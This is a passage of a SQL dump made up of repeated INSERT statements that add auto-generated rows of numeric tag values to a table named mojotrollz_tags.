'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171612, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171613, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171614, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171615, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171616, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171617, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171623, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171624, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171625, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171626, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171628, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171629, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171630, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171631, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171632, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171633, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171634, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171635, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171636, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171638, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171639, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171640, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171641, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171642, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171643, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171644, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171646, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171647, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171648, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171650, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171651, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171652, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171653, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171654, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171655, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171656, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171657, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171659, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171660, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171661, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171669, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171670, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171671, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171672, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171673, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171678, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171680, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171681, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171682, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171683, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171684, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171685, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171686, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171687, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171688, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171690, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171693, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171696, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171697, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171698, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171699, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171700, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171701, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171702, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171704, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171705, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171708, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171709, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171710, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171711, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171713, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171714, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171715, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171716, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171717, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171722, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171723, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171724, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171725, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171730, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171731, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171732, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171733, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171735, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171736, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171737, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171738, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171739, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171741, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171742, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171747, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171751, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171756, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171757, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171758, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171759, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171762, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171772, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171774, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171775, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171776, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171938, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171939, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171940, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171941, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171942, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171943, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172911, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172941, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172942, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172944, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172945, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172946, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172947, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172948, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172949, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172950, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172951, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172952, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172953, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172954, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172955, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172956, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172957, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172958, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172959, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172960, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172961, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172962, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172963, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172964, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172965, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172966, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172967, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172968, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172969, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172970, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172971, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172972, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172973, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172974, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172975, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172976, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172977, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172978, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172979, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172980, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172981, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172982, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172983, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172985, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172987, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172988, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172990, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172991, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172992, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172993, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172994, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172995, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172996, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172997, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173006, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173007, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173008, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173009, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173010, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173011, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173012, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173013, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173014, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173015, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173016, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173017, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173018, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173019, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173020, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173021, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173022, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173023, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173024, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173025, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173026, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173027, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173028, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173029, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173030, 2, 1, 1, 'generated'); 